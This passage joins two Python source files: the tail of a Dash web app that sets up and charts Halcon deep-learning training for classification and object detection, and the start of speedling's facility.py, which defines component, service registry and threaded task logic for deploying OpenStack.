State('PretrainedModel_CL', 'value'),
State('ImWidth_CL', 'value'),
State('ImHeight_CL', 'value'),
State('ImChannel_CL', 'value'),
State('BatchSize_CL', 'value'),
State('InitialLearningRate_CL', 'value'),
State('Momentum_CL', 'value'),
State('NumEpochs_CL', 'value'),
State('ChangeLearningRateEpochs_CL', 'value'),
State('lr_change_CL', 'value'),
State('WeightPrior_CL', 'value'),
State('class_penalty_CL', 'value'),
State('AugmentationPercentage_CL_slider', 'value'),
State('Rotation_CL', 'value'),
State('mirror_CL', 'value'),
State('BrightnessVariation_CL', 'value'),
State('BrightnessVariationSpot_CL', 'value'),
State('RotationRange_CL', 'value'),
# State('IgnoreDirection', 'value'),
# State('ClassIDsNoOrientationExist', 'value'),
# State('ClassIDsNoOrientation', 'value'),
)
def makeJson_CL(ProjectName_CL, Runtime_CL, PretrainedModel_CL, ImWidth_CL, ImHeight_CL, ImChannel_CL,
BatchSize_CL, InitialLearningRate_CL, Momentum_CL, NumEpochs_CL,
ChangeLearningRateEpochs_CL, lr_change_CL, WeightPrior_CL,
class_penalty_CL, AugmentationPercentage_CL, Rotation_CL, mirror_CL,
BrightnessVariation_CL, BrightnessVariationSpot_CL,
RotationRange_CL):
ParameterDict = {'ProjectName': ProjectName_CL,
'Runtime': Runtime_CL, 'PretrainedModel': PretrainedModel_CL, 'ImWidth': ImWidth_CL,
'ImHeight': ImHeight_CL,
'ImChannel': ImChannel_CL,
'BatchSize': BatchSize_CL, 'InitialLearningRate': InitialLearningRate_CL, 'Momentum': Momentum_CL,
'NumEpochs': NumEpochs_CL,
'ChangeLearningRateEpochs': ChangeLearningRateEpochs_CL, 'lr_change': lr_change_CL,
'WeightPrior': WeightPrior_CL,
'class_penalty': class_penalty_CL, 'AugmentationPercentage': AugmentationPercentage_CL,
'Rotation': Rotation_CL, 'mirror': mirror_CL,
'BrightnessVariation': BrightnessVariation_CL,
'BrightnessVariationSpot': BrightnessVariationSpot_CL,
'RotationRange': RotationRange_CL, }
ctx = dash.callback_context
if not ctx.triggered:
button_id = 'Null'
else:
button_id = ctx.triggered[0]['prop_id'].split('.')[0]
if button_id == 'parameters_out_button':
with open('parameters_json.txt', 'w') as outfile:
json.dump(ParameterDict, outfile)
return 'To json done!'
@app.callback(Output('metrics_CL', 'children'),
Input('interval_graph_CL', 'n_intervals'))
def update_metrics_CL(n):
# Indication Text configuration
# Extract data from Hdict and show as texts.
style = {'padding': '5px', 'fontSize': '16px'}
get_metrics = run.get_TrainInfo_CL()
if get_metrics:
time_elapsed = get_metrics[0]
time_remaining = get_metrics[1]
epoch_metrics = get_metrics[2]
else:
time_elapsed = 0
time_remaining = 0
epoch_metrics = 0
return [
html.Span('Time Elapsed: {}'.format(str(datetime.timedelta(seconds=int(time_elapsed)))), style=style),
html.Span('Time Remaining: {}'.format(time_remaining), style=style),
html.Span('Current Epoch: {}'.format(epoch_metrics), style=style)
]
# Multiple components can update everytime interval gets fired.
@app.callback(Output('iteration_loss_graph_CL', 'figure'),
Input('interval_graph_CL', 'n_intervals'))
def iteration_loss_graph_CL(n):
# Loss Graph configuration
# Using plotly subplots. May consider changing to others.
iteration_loss_graph_fig = plotly.tools.make_subplots(rows=1, cols=1, vertical_spacing=1)
iteration_loss_graph_fig['layout']['margin'] = {
'l': 80, 'r': 80, 'b': 50, 't': 80, 'autoexpand': False,
}
iteration_loss_graph_fig['layout']['legend'] = {'x': 0, 'y': 1, 'xanchor': 'left', 'title': 'Loss-Iteration Graph'}
iteration_loss_graph_fig.update_layout(legend_title_text=123)
iteration_loss_graph_fig.update_xaxes(title_text="Iteration", row=1, col=1)
iteration_loss_graph_fig.update_yaxes(title_text="Loss", row=1, col=1)
# If Hdict files does not exist, clear graph and lists for plotting.
# Therefore, could reset graph by deleting the Hdict files.
getTrainInfo = run.get_TrainInfo_CL()
if not getTrainInfo:
iterationList.clear()
epochOfLossList.clear()
lossList.clear()
else:
epoch_TrainInfo = getTrainInfo[2]
loss = getTrainInfo[3]
iteration = getTrainInfo[4]
# Avoid duplicate output from Halcon.
# Interval for this web app is set to 1 sec. However feedback from Halcon may take up tp 5 secs.
# Using <in> with list, average time complexity: O(n)
# if iteration not in iterationList:
epochOfLossList.append(epoch_TrainInfo)
lossList.append(loss)
iterationList.append(iteration)
# Add the values to graph and start plotting.
iteration_loss_graph_fig.append_trace({
'x': epochOfLossList,
'y': lossList,
'text': iterationList,
'name': 'iteration vs loss',
'mode': 'lines',
'type': 'scatter'
}, 1, 1)
return iteration_loss_graph_fig
@app.callback(Output('top1_error_graph_CL', 'figure'),
Input('interval_graph_CL', 'n_intervals'))
def top1_error_graph_CL(n):
# Top1 Error Graph configuration.
# Using plotly subplots. May consider changing to others.
top1_error_graph_fig = plotly.tools.make_subplots(rows=1, cols=1, vertical_spacing=1, )
top1_error_graph_fig['layout']['margin'] = {
'l': 80, 'r': 80, 'b': 100, 't': 80, 'autoexpand': False,
}
top1_error_graph_fig['layout']['legend'] = {'x': 0, 'y': 1, 'xanchor': 'left'}
top1_error_graph_fig.update_xaxes(title_text="Epoch", row=1, col=1)
top1_error_graph_fig.update_yaxes(title_text="Top1 Error", row=1, col=1)
# If Hdict files does not exist, clear graph and lists for plotting.
# Therefore, could reset graph by deleting the Hdict files.
getEvaluationInfo = run.get_EvaluationInfo_CL()
if not getEvaluationInfo:
TrainSet_top1_error_valueList.clear()
ValidationSet_top1_error_valueList.clear()
epochOfTop1ErrorList.clear()
else:
epoch_EvaluationInfo = getEvaluationInfo[0]
TrainSet_top1_error_value = getEvaluationInfo[1]
ValidationSet_top1_error_value = getEvaluationInfo[2]
# Avoid duplicate output from Halcon.
# Interval for this web app is set to 1 sec. However feedback from Halcon may take up tp 5 secs.
# Using <in> with list, average time complexity: O(n)
if TrainSet_top1_error_value not in TrainSet_top1_error_valueList:
epochOfTop1ErrorList.append(epoch_EvaluationInfo)
TrainSet_top1_error_valueList.append(TrainSet_top1_error_value)
ValidationSet_top1_error_valueList.append(ValidationSet_top1_error_value)
# Add the values to graph and start plotting.
# Two plots on the same graph.
top1_error_graph_fig.append_trace({
'x': epochOfTop1ErrorList,
'y': TrainSet_top1_error_valueList,
'name': 'Train Set Top1_error',
'mode': 'lines+markers',
'type': 'scatter'
}, 1, 1)
top1_error_graph_fig.append_trace({
'x': epochOfTop1ErrorList,
'y': ValidationSet_top1_error_valueList,
'name': 'Validation Set Top1_error',
'mode': 'lines+markers',
'type': 'scatter'
}, 1, 1)
return top1_error_graph_fig
############################################ Object Detection ################################
@app.callback(Output('MinLevel_OD', 'children'),
Output('MaxLevel_OD', 'children'),
Output('AnchorNumSubscales_OD', 'children'),
Output('AnchorAspectRatios_OD', 'children'),
Output('Estimate_values_loading_OD', 'children'),
Input('estimate_button_OD', 'n_clicks'),
State('ImWidth_OD', 'value'),
State('ImHeight_OD', 'value'),
State('TrainingPercent_OD', 'value'),
State('ValidationPercent_OD', 'value'),
)
def estimate_value_OD(estimate_button_OD, ImWidth_OD, ImHeight_OD, TrainingPercent_OD, ValidationPercent_OD, ):
Label_data_OD = 'C:/Users/930415/Desktop/Chadle_Projects/Chadle_Data/Object_Detection/NTBW_Image Analytics/NTBW_Initial_2.hdict'
ctx_estimate_value_OD = dash.callback_context
if not ctx_estimate_value_OD.triggered:
button_id = 'Null'
else:
button_id = ctx_estimate_value_OD.triggered[0]['prop_id'].split('.')[0]
if button_id == 'estimate_button_OD':
estimate_value = run_OD.estimate_values_OD(ImWidth_OD, ImHeight_OD, TrainingPercent_OD,
ValidationPercent_OD, Label_data_OD)
DLDataset_preprocess = (estimate_value[0])
MinLevel_OD = (estimate_value[1])
MaxLevel_OD = (estimate_value[2])
AnchorNumSubscales_OD = (estimate_value[3])
estimate_value = [round(number, 3) for number in estimate_value[4]]
print(estimate_value)
AnchorAspectRatios_OD_String = ", ".join(str(number) for number in estimate_value)
AnchorAspectRatios_OD = AnchorAspectRatios_OD_String
return MinLevel_OD, MaxLevel_OD, AnchorNumSubscales_OD, AnchorAspectRatios_OD, ' '
else:
return ' ', ' ', ' ', ' ', ' '
@app.callback(Output('training_output_OD', 'children'),
Output('Training_loading_OD', 'children'),
Input('operation_button_OD', 'n_clicks'),
# State('ProjectName_OD', 'value'),
State('ImWidth_OD', 'value'),
State('ImHeight_OD', 'value'),
State('TrainingPercent_OD', 'value'),
State('ValidationPercent_OD', 'value'),
State('MinLevel_Input_OD', 'value'),
State('MaxLevel_Input_OD', 'value'),
State('AnchorNumSubscales_Input_OD', 'value'),
State('AnchorAspectRatios_Input_OD', 'value'),
State('ImChannel_OD', 'value'),
State('PretrainedModel_OD', 'value'),
State('InstanceType_OD', 'value'),
State('NumClasses_OD', 'value'),
State('Capacity_OD', 'value'),
State('AugmentationPercentage_OD', 'value'),
State('Rotation_OD', 'value'),
State('mirror_OD', 'value'),
State('BrightnessVariation_OD', 'value'),
State('BrightnessVariationSpot_OD', 'value'),
State('RotationRange_OD', 'value'),
State('BatchSize_OD', 'value'),
State('InitialLearningRate_OD', 'value'),
State('Momentum_OD', 'value'),
State('NumEpochs_OD', 'value'),
State('ChangeLearningRateEpochs_OD', 'value'),
State('lr_change_OD', 'value'),
State('WeightPrior_OD', 'value'),
State('class_penalty_OD', 'value'),
)
def operation_OD(operation_button_OD, ImWidth_OD, ImHeight_OD, TrainingPercent_OD, ValidationPercent_OD,
MinLevel_Input_OD, MaxLevel_Input_OD, AnchorNumSubscales_Input_OD, AnchorAspectRatios_Input_OD,
ImChannel_OD, PretrainedModel_OD, InstanceType_OD, NumClasses_OD, Capacity_OD,
AugmentationPercentage_OD, Rotation_OD, mirror_OD, BrightnessVariation_OD, BrightnessVariationSpot_OD,
RotationRange_OD, BatchSize_OD, InitialLearningRate_OD, Momentum_OD, NumEpochs_OD,
ChangeLearningRateEpochs_OD,
lr_change_OD, WeightPrior_OD, class_penalty_OD):
Label_data_OD = 'C:/Users/930415/Desktop/Chadle_Projects/Chadle_Data/Object_Detection/NTBW_Image Analytics/NTBW_Initial_2.hdict'
ctx_operation_OD = dash.callback_context
if not ctx_operation_OD.triggered:
button_id = 'Null'
else:
button_id = ctx_operation_OD.triggered[0]['prop_id'].split('.')[0]
if button_id == 'operation_button_OD':
estimate_value = run_OD.estimate_values_OD(ImWidth_OD, ImHeight_OD, TrainingPercent_OD,
ValidationPercent_OD, Label_data_OD)
DLDataset_preprocess = (estimate_value[0])
# If input empty, use Halcon estimate value.
if MinLevel_Input_OD:
MinLevel_OD = MinLevel_Input_OD
else:
MinLevel_OD = (estimate_value[1])
if MaxLevel_Input_OD:
MaxLevel_OD = MaxLevel_Input_OD
else:
MaxLevel_OD = (estimate_value[2])
if AnchorNumSubscales_Input_OD:
AnchorNumSubscales_OD = AnchorNumSubscales_Input_OD
else:
AnchorNumSubscales_OD = (estimate_value[3])
if AnchorAspectRatios_Input_OD:
AnchorAspectRatios_OD = AnchorAspectRatios_Input_OD.split(',')
else:
AnchorAspectRatios_OD = (estimate_value[4])
print(ImChannel_OD)
preprocess_OD = run_OD.preprocess_OD(ImWidth_OD, ImHeight_OD, ImChannel_OD, TrainingPercent_OD,
ValidationPercent_OD, Label_data_OD,
PretrainedModel_OD,
InstanceType_OD, DLDataset_preprocess,
MinLevel_OD, MaxLevel_OD,
AnchorNumSubscales_OD, AnchorAspectRatios_OD, NumClasses_OD, Capacity_OD)
DLDatasetFileName = preprocess_OD[0]
DLPreprocessParamFileName = preprocess_OD[1]
ModelFileName = preprocess_OD[2]
prepare_for_training_OD = run_OD.prepare_for_training_OD(AugmentationPercentage_OD, Rotation_OD, mirror_OD,
BrightnessVariation_OD, BrightnessVariationSpot_OD,
RotationRange_OD, BatchSize_OD,
InitialLearningRate_OD, Momentum_OD, NumEpochs_OD,
ChangeLearningRateEpochs_OD,
lr_change_OD, WeightPrior_OD, class_penalty_OD,
DLDatasetFileName, DLPreprocessParamFileName,
ModelFileName)
DLModelHandle = prepare_for_training_OD[0][0]
DLDataset = prepare_for_training_OD[1][0]
TrainParam = prepare_for_training_OD[2][0]
# Training
training_OD = run_OD.training_OD(DLDataset, DLModelHandle, TrainParam)
return ' ', ' '
# OD metrics and graphs
@app.callback(Output('metrics_OD', 'children'),
Input('interval_graph_OD', 'n_intervals'))
def update_metrics_OD(n):
# Indication Text configuration
# Extract data from Hdict and show as texts.
style = {'padding': '5px', 'fontSize': '16px'}
get_metrics = run_OD.get_TrainInfo_OD()
if get_metrics:
time_elapsed = get_metrics[0]
time_remaining = get_metrics[1]
epoch_metrics = get_metrics[2]
else:
time_elapsed = 0
time_remaining = 0
epoch_metrics = 0
return [
html.Span('Time Elapsed: {}'.format(str(datetime.timedelta(seconds=int(time_elapsed)))), style=style),
html.Span('Time Remaining: {}'.format(time_remaining), style=style),
html.Span('Current Epoch: {}'.format(epoch_metrics), style=style)
]
# Multiple components can update everytime interval gets fired.
@app.callback(Output('iteration_loss_graph_OD', 'figure'),
Input('interval_graph_OD', 'n_intervals'))
def iteration_loss_graph_CL(n):
# Loss Graph configuration
# Using plotly subplots. May consider changing to others.
iteration_loss_graph_fig = plotly.tools.make_subplots(rows=1, cols=1, vertical_spacing=1)
iteration_loss_graph_fig['layout']['margin'] = {
'l': 80, 'r': 80, 'b': 50, 't': 80, 'autoexpand': False,
}
iteration_loss_graph_fig['layout']['legend'] = {'x': 0, 'y': 1, 'xanchor': 'left', 'title': 'Loss-Iteration Graph'}
iteration_loss_graph_fig.update_layout(legend_title_text=123)
iteration_loss_graph_fig.update_xaxes(title_text="Iteration", row=1, col=1)
iteration_loss_graph_fig.update_yaxes(title_text="Loss", row=1, col=1)
# If Hdict files does not exist, clear graph and lists for plotting.
# Therefore, could reset graph by deleting the Hdict files.
getTrainInfo = run_OD.get_TrainInfo_OD()
if not getTrainInfo:
iterationList.clear()
epochOfLossList.clear()
lossList.clear()
else:
epoch_TrainInfo = getTrainInfo[2]
loss = getTrainInfo[3]
iteration = getTrainInfo[4]
# Avoid duplicate output from Halcon.
# Interval for this web app is set to 1 sec. However feedback from Halcon may take up tp 5 secs.
# Using <in> with list, average time complexity: O(n)
if iteration not in iterationList:
epochOfLossList.append(epoch_TrainInfo)
lossList.append(loss)
iterationList.append(iteration)
# Add the values to graph and start plotting.
iteration_loss_graph_fig.append_trace({
'x': epochOfLossList,
'y': lossList,
'text': iterationList,
'name': 'iteration vs loss',
'mode': 'lines',
'type': 'scatter'
}, 1, 1)
return iteration_loss_graph_fig
@app.callback(Output('mean_ap_graph_OD', 'figure'),
Input('interval_graph_OD', 'n_intervals'))
def mean_ap_graph_OD(n):
# Mean AP Graph configuration.
# Using plotly subplots. May consider changing to others.
mean_ap_graph_fig = plotly.tools.make_subplots(rows=1, cols=1, vertical_spacing=1, )
mean_ap_graph_fig['layout']['margin'] = {
'l': 80, 'r': 80, 'b': 100, 't': 80, 'autoexpand': False,
}
mean_ap_graph_fig['layout']['legend'] = {'x': 0, 'y': 1, 'xanchor': 'left'}
mean_ap_graph_fig.update_xaxes(title_text="Epoch", row=1, col=1)
mean_ap_graph_fig.update_yaxes(title_text="Top1 Error", row=1, col=1)
# If Hdict files does not exist, clear graph and lists for plotting.
# Therefore, could reset graph by deleting the Hdict files.
getEvaluationInfo = run_OD.get_EvaluationInfo_OD()
if not getEvaluationInfo:
TrainSet_mean_ap_valueList.clear()
ValidationSet_mean_ap_valueList.clear()
epochOfMeanAPList.clear()
else:
epoch_EvaluationInfo = getEvaluationInfo[0]
TrainSet_mean_ap_value = getEvaluationInfo[1]
ValidationSet_mean_ap_value = getEvaluationInfo[2]
# Avoid duplicate output from Halcon.
# Interval for this web app is set to 1 sec. However feedback from Halcon may take up tp 5 secs.
# Using <in> with list, average time complexity: O(n)
# if TrainSet_mean_ap_value not in TrainSet_mean_ap_valueList:
epochOfMeanAPList.append(epoch_EvaluationInfo)
TrainSet_mean_ap_valueList.append(TrainSet_mean_ap_value)
ValidationSet_mean_ap_valueList.append(ValidationSet_mean_ap_value)
# Add the values to graph and start plotting.
# Two plots on the same graph.
mean_ap_graph_fig.append_trace({
'x': epochOfMeanAPList,
'y': TrainSet_mean_ap_valueList,
'name': 'Train Set Top1_error',
'mode': 'lines+markers',
'type': 'scatter'
}, 1, 1)
mean_ap_graph_fig.append_trace({
'x': epochOfMeanAPList,
'y': ValidationSet_mean_ap_valueList,
'name': 'Validation Set Top1_error',
'mode': 'lines+markers',
'type': 'scatter'
}, 1, 1)
return mean_ap_graph_fig
if __name__ == '__main__':
app.run_server(debug=True)
|
facility.py
|
import inspect
import logging
import os.path
import threading
import time
from collections import abc
from collections import defaultdict
from speedling import cfgfile
from speedling import conf
from speedling import gitutils
from speedling import inv
from speedling import localsh
from speedling import piputils
from speedling import pkgutils
from speedling import util
LOG = logging.getLogger(__name__)
# name: same as the key (auto populated)
# deploy_source pkg (deb/rpm/..), pypi (pip install ..), container
# deploy_mode: standalone (systemd service), mod_wsgi, uwsgi, container, nginx, ...
# consider multiple httpd as well
# instance_name: httpd@instance_name
# 'compose': 'func_ptr to function executed before tasks but after inventory',
# 'goal', 'task for this service, it can be shared within the components, it may differ based on action
# actions: update, reconfigure, deploy, wipe, dry_reconfigure, dry_update
REGISTERED_SERVICES = {}
# TODO: the registered services has to provide the options only, we need to have configured service list
# as well, which includes the selection and read by the service steps
REGISTERED_COMPONENTS = {}
UNIT_NAME_MAPPING = {}
class Component(object):
default_component_config = {}
deploy_source = 'src'
deploy_mode = 'standalone'
supported_deploy_mode = {'src', 'pkg', 'pip', 'asset'}
services = {}
leaf = True
final_task = None
def extend_consumers(self, dependencies, prefix=tuple()):
# supperted things: [{sname: section, component:Component}, ..] first is default
# {sname: Component, sname2: Component2 } # unordered
if isinstance(dependencies, abc.Mapping):
for k, v in dependencies.items():
if isinstance(v, Component):
consumed_as = v.consumers.setdefault(self, [])
consumed_as.append(prefix + tuple(k))
if isinstance(v, abc.Mapping):
self.extend_consumers(v, prefix=prefix + tuple(k))
if isinstance(v, abc.Iterable):
for d in v:
if isinstance(d, abc.Mapping):
if 'sname' in d:
consumed_as = d['component'].consumers.setdefault(self, [])
consumed_as.append(prefix + (d['sname'],))
else:
self.extend_consumers(d, prefix)
# TODO: other cases
def __init__(self, alias='', offset='', dependencies={}):
"""alias: The services from the nameless version will be refered ASIS,
The named versions will be suffixed @alias
like nova-api@RegionOne nova-api@RegionTWO
The component itself is referred as the lowercase leaf class name,
with the same suffix rules.
The alias is not for region name.
offset: In may Cases a single component instance hadles all version
of the service on the same node, but in case the component
chooses to allow otherwise their name will include the offset
http@RegionOne@0 http@@0
dependencies: Each component can have TYPE slots for other components
The relationship is the user defines the providers as dependency.
"""
# if your class just customization for a normally leaf class
# you want to use the parent's name
# I mean if a mariadb subclass just changes some minor way
# you do not want every usage to be renamed, but if you start
# installing postgres it should have a different name
if self.leaf:
self.short_name = self.__class__.__name__.lower()
else:
next_cls = super(self.__class__, self)
while next_cls.leaf:
next_cls = super(self.__class__, self)
self.short_name = next_cls.__name__.lower()
assert self.short_name != 'component'
self.alias = alias
self.offset = offset
self.dependencies = dependencies
self.consumers = {}
self.extend_consumers(dependencies)
if alias or offset:
suffix = '@' + alias
else:
suffix = ''
if offset:
suffix += '@' + str(offset)
self.name = self.short_name + suffix
self.suffix = suffix
register_component(self)
self.changed = defaultdict(dict)
# per instance lock
nwc = util.lock_sigleton_call(self.have_content)
self.have_content = nwc # nwc.__get__(self, self)
def bound_to_instance(self, gf):
bounded = Task(gf, self)
name = gf.__name__
# bounded = gf.__get__(self, self)
setattr(self, name, bounded)
return bounded
def get_component_config(self):
"""Without argument only allowed on managed nodes"""
i = inv.get_this_inv()
ccc = i.get('component_configs')
cc = self.default_component_config.deepcopy()
if ccc:
util.dict_merge(cc, ccc.get(self.name, dict()))
return cc
def compose(self):
"""called at compose lifecycle if the component or service involved.
Only called on the control node"""
if self.final_task:
add_goal(self.final_task)
def node_compose(self):
"""The managed nodes call it for node base composition,
for example required packages."""
pkgutils.add_compose(self.get_node_packages())
def get_final_task(task=None):
"""acquiring task which can be waited for.
usually it is the last task the component made
But some cases the component may intiate content fetch for after
usage (like datafiles for test)
if another task is better for the waiter,
for wait he can request it"""
pass
# NOTE: interface will change
def populate_peer_info_for(self, nodes=set(), mode=None, network='*'):
"""Used at compose phase for providing network connectivity information,
for other nodes, the exact payload is not defined,
The caller knows the calle implementation."""
# NOTE: Might be used for firewall rule creation `hints`
pass
def populate_extra_cfg_for(self, nodes, component, cfg_extend):
if isinstance(component, Component):
componenet_name = component.name
else:
componenet_name = component
for n in nodes:
node = self.get_node(n)
node['cfg_extend'].setdefault(componenet_name, {})
cdict = node['cfg_extend'][componenet_name]
util.dict_merge(cdict, cfg_extend)
# NOTE: cache it ?
def get_services_global_name(self):
""" get service dict with naming rules applied"""
if hasattr(self, '_get_services'):
return self._get_services
self._get_services = {k + self.suffix: v for (k, v) in self.services.items()}
return self._get_services
def call_do(self, hosts, the_do, c_args=tuple(), c_kwargs={}):
real_args = (self.name, ) + c_args
return inv.do_do(hosts, the_do, real_args, c_kwargs)
def call_diff_args(self, matrix, do):
return inv.do_diff(matrix, do, self.name)
def distribute_as_file(self, *args, **kwargs):
return inv.distribute_as_file(*args, **kwargs)
def distribute_for_command(self, *args, **kwargs):
return inv.distribute_for_command(*args, **kwargs)
def hosts_with_any_service(self, services):
return inv.hosts_with_any_service(set(s + self.suffix for s in services))
def hosts_with_component(self, component):
if isinstance(component, Component):
component_name = component.name
else:
if '@' not in component:
component_name = component + self.suffix
else:
component_name = component
return inv.hosts_with_component(component_name)
def get_state_dir(self, extra=''):
return util.get_state_dir(os.path.sep.join((self.name, extra)))
def hosts_with_service(self, service):
return inv.hosts_with_service(service + self.suffix)
def get_node(self, *args, **kwargs):
return inv.get_node(*args, **kwargs)
def get_this_node(self, *args, **kwargs):
return inv.get_this_node(*args, **kwargs)
def get_this_inv(self, *args, **kwargs):
return inv.get_this_inv(*args, **kwargs)
def get_addr_for(self, *args, **kwargs):
return inv.get_addr_for(*args, **kwargs)
def file_ini(self, target_path, paramters, *args, **kwargs):
node = self.get_this_node()
cfg_extend = node['cfg_extend']
node_inv = node['inv']
# we might support callable instead of plain type
if self.name in cfg_extend:
comp_cfg_extend = cfg_extend[self.name]
if target_path in comp_cfg_extend:
util.dict_merge(paramters, comp_cfg_extend[target_path]) # modifies the original dict!
extend_config = node_inv.get('components', {}).get(self.name, {}).get('extend_config', {})
if target_path in extend_config:
util.dict_merge(paramters, extend_config[target_path]) # modifies the original dict!
self.changed['file'][target_path] = cfgfile.ini_file_sync(target_path, paramters,
*args, **kwargs)
def file_plain(self, target_path, *args, **kwargs):
self.changed['file'][target_path] = cfgfile.content_file(target_path,
*args, **kwargs)
# everything apperas on the fs is named as file
def file_path(self, link, *args, **kwargs):
self.changed['file'][link] = cfgfile.ensure_path_exists(link, *args, **kwargs)
def file_haproxy(self, target_path, *args, **kwargs):
self.changed['file'][target_path] = cfgfile.haproxy_file(target_path, *args, **kwargs)
def file_rabbit(self, target_path, *args, **kwargs):
self.changed['file'][target_path] = cfgfile.rabbit_file(target_path, *args, **kwargs)
def file_install(self, target_path, *args, **kwargs):
self.changed['file'][target_path] = cfgfile.install_file(target_path, *args, **kwargs)
def file_sym_link(self, target_path, *args, **kwargs):
self.changed['file'][target_path] = cfgfile.ensure_sym_link(target_path, *args, **kwargs)
def etccfg_content(self, dry=None):
"""if your config can be done before any command call place it here,
this stept meant to be /etc like changes """
def have_binaries(self):
pkgutils.ensure_compose()
# let the have_content call this src_
def src_fetch(self):
if self.deploy_source == 'src':
gconf = conf.get_global_config()
need_git = gconf.get('use_git', True) # switch these if you do have good image
if need_git: # TODO: add more repo types
gitutils.process_component_repo(self)
def src_compile(self):
pass
def src_install(self):
pass
def have_content(self):
self.have_binaries()
self.src_fetch()
self.src_compile()
self.src_install()
self.etccfg_content()
def wait_for_components(self, *comps):
task_wants(*(comp.final_task for comp in comps if comp.final_task), caller_name=self.__class__.__name__)
def get_node_packages(self):
"""which packages the component needs int current node context"""
return set()
def filter_node_enabled_services(self, candidates):
i = self.get_this_inv()
services = i.get('services', set())
return {c + self.suffix for c in candidates if c + self.suffix in services}
def get_enabled_services_from_component(self):
return self.filter_node_enabled_services(self.services.keys())
def unit_name_mapping(style):
return {}
# TODO add default bounce condition and coordinated bounce
def __str__(self):
return self.name
class LoadBalancer(Component):
deploy_source = 'pkg'
# TODO: make LB abstract to support LB != HAProxy
# NOTE: theoretically httpd can do ballancing, but ..
pass
class SQLDB(Component):
deploy_source = 'pkg'
# Consider postgres
def db_url(*args, **kwargs):
raise NotImplementedError
# provides basic db access to the listed schemas
def register_user_with_schemas(self, user, schema_names):
raise NotImplementedError
class Messaging(Component):
deploy_source = 'pkg'
def get_transport_url(self):
raise NotImplementedError
# scoping are very implementation specific
def register_user(self, user):
raise NotImplementedError
class VirtDriver(Component):
pass
# TODO: convince the localsh to have retry
def do_retrycmd_after_content(cname, cmd):
self = get_component(cname)
self.have_content()
retry = 30
while True:
try:
localsh.run(cmd)
except Exception:
if retry == 0:
raise
else:
break
time.sleep(0.2)
retry -= 1
class OpenStack(Component):
# TODO: place hare some config possibility like worker number strategy
regions = ['RegionOne'] # move vips to region, keystone may register himself to multiple, but others should use single (per instance)
def get_node_packages(self):
pkgs = super(OpenStack, self).get_node_packages()
if self.deploy_source == 'src':
pkgs.update({'python3-pip', 'git', 'lib-dev\\python3',
'util-lang\\gcc-g++',
'lib-dev\\ffi', 'lib-dev\\xslt', 'lib-dev\\openssl',
'lib-py3\\pymysql'})
return pkgs
# overrides
def src_install(self):
gconf = conf.get_global_config()
need_pip = gconf.get('use_pip', True)
if need_pip:
piputils.setup_develop(self)
class InterfaceDriver(Component):
pass
# TODO: the ciken egg problem can be solvad as egg chickin as well, it will be less confusing
class StorageBackend(Component):
def get_glance_conf_extend(self, sname):
"""provides full config dict, the name is the section name and ':type' glance expects
The response should be repetable, if backand may store as a state."""
return {'/etc/glance/glance-api.conf': {}}
def get_cinder_conf_extend(self, sname):
"""provides full config dict, the name is the section name cinder expects
The response should be repetable, if backand may store as a state."""
return {'/etc/cinder/cinder.conf': {}}
def get_nova_conf_extend(self):
return {'/etc/nova/nova.conf': {}}
def get_waits_for_nova_task(self):
return {self.final_task}
def get_waits_for_glance_task(self):
return {self.final_task}
def get_waits_for_cinder_task(self):
return {self.final_task}
def compose(self):
super(StorageBackend, self).compose()
for comp, consumed_ases in self.consumers.items():
if comp.short_name == 'glance': # The StorageBackend class should not in this file
for consumed_as in consumed_ases:
cfg_extend = self.get_glance_conf_extend(consumed_as[-1])
g_api_nodes = comp.hosts_with_service('glance-api')
self.populate_extra_cfg_for(g_api_nodes, comp, cfg_extend)
continue
if comp.short_name == 'nova': # The StorageBackend class should not in this file
for consumed_as in consumed_ases:
cfg_extend = self.get_nova_conf_extend()
g_api_nodes = comp.hosts_with_service('nova-compute')
self.populate_extra_cfg_for(g_api_nodes, comp, cfg_extend)
continue
if comp.short_name == 'cinder': # The StorageBackend class should not in this file
for consumed_as in consumed_ases:
cfg_extend = self.get_cinder_conf_extend(consumed_as[-1])
g_api_nodes = comp.hosts_with_service('cinder-volume')
self.populate_extra_cfg_for(g_api_nodes, comp, cfg_extend)
ENSURE_COMPOSE_LOCK = threading.Lock()
def do_node_generic_system():
pkgutils.ensure_compose()
# Deprecated for external use
def _register_services(srvs):
if isinstance(srvs, abc.Mapping):
for n, srv in srvs.items():
# TODO: add name in the component loop
srv['name'] = n
REGISTERED_SERVICES[n] = srv
else: # list
# TODO: delete the list way
for srv in srvs:
assert srv['name'] not in REGISTERED_SERVICES
REGISTERED_SERVICES[srv['name']] = srv
def get_service_by_name(name):
return REGISTERED_SERVICES[name]
def register_component(component):
assert component.name not in REGISTERED_COMPONENTS
REGISTERED_COMPONENTS[component.name] = component
srvs = component.get_services_global_name()
if not srvs:
return
for s, d in srvs.items():
d['component'] = component
_register_services(srvs)
def get_component(component):
return REGISTERED_COMPONENTS[component]
GOALS = set()
def add_goals(goals):
GOALS.update(set(goals))
def add_goal(goal):
GOALS.add(goal)
def get_goals():
return GOALS
# cache
def get_local_active_services():
host_record = inv.get_this_inv()
services = host_record.get('services', set())
srvs = {}
for s in services:
if s not in REGISTERED_SERVICES:
LOG.warning("Unknown service '{}'".format(s))
else:
srvs[s] = REGISTERED_SERVICES[s]
return srvs
# cache
def get_local_active_components():
host_record = inv.get_this_inv()
services = get_local_active_services()
components = host_record.get('extra_components', set())
comps = set()
for c in components:
comp = REGISTERED_COMPONENTS.get(c, None)
if not comp:
LOG.warning("Unknown component '{}'".format(c))
else:
comps.add(comp)
for s, r in services.items():
c = r.get('component', None)
if c:
comps.add(c)
return comps
def compose():
for c in REGISTERED_COMPONENTS.values():
c.compose()
task_sync_mutex = threading.Lock()
pending = set()
def task_add_wants(task, *wants):
if hasattr(task, 'wants'):
task.wants += wants
else:
task.wants = wants
FAILED = []
def _taskify(*args):
task_sync_mutex.acquire()
for task in args:
if not hasattr(task, 'thr'):
task.failed = False
def helper_func():
t = task
start = time.time()
def _finish_log():
try:
if hasattr(t, 'wants'): # exrta deps as task attibute
task_wants(*t.wants, caller_name=t.__name__)
t()
except BaseException:
FAILED.append(t)
t.failed = True
LOG.error(t.__name__ + ' failed in ' + str(time.time() - start) + 's (waits included)')
raise
else:
LOG.info(t.__name__ + ' finished in ' + str(time.time() - start) + 's (waits included)')
finally:
task_sync_mutex.acquire()
pending.remove(t)
task_sync_mutex.release()
return _finish_log
task.thr = threading.Thread(target=helper_func())
pending.add(task)
task.thr.start()
task_sync_mutex.release()
return [tsk for tsk in args if tsk.thr.is_alive()]
def log_pending():
task_sync_mutex.acquire()
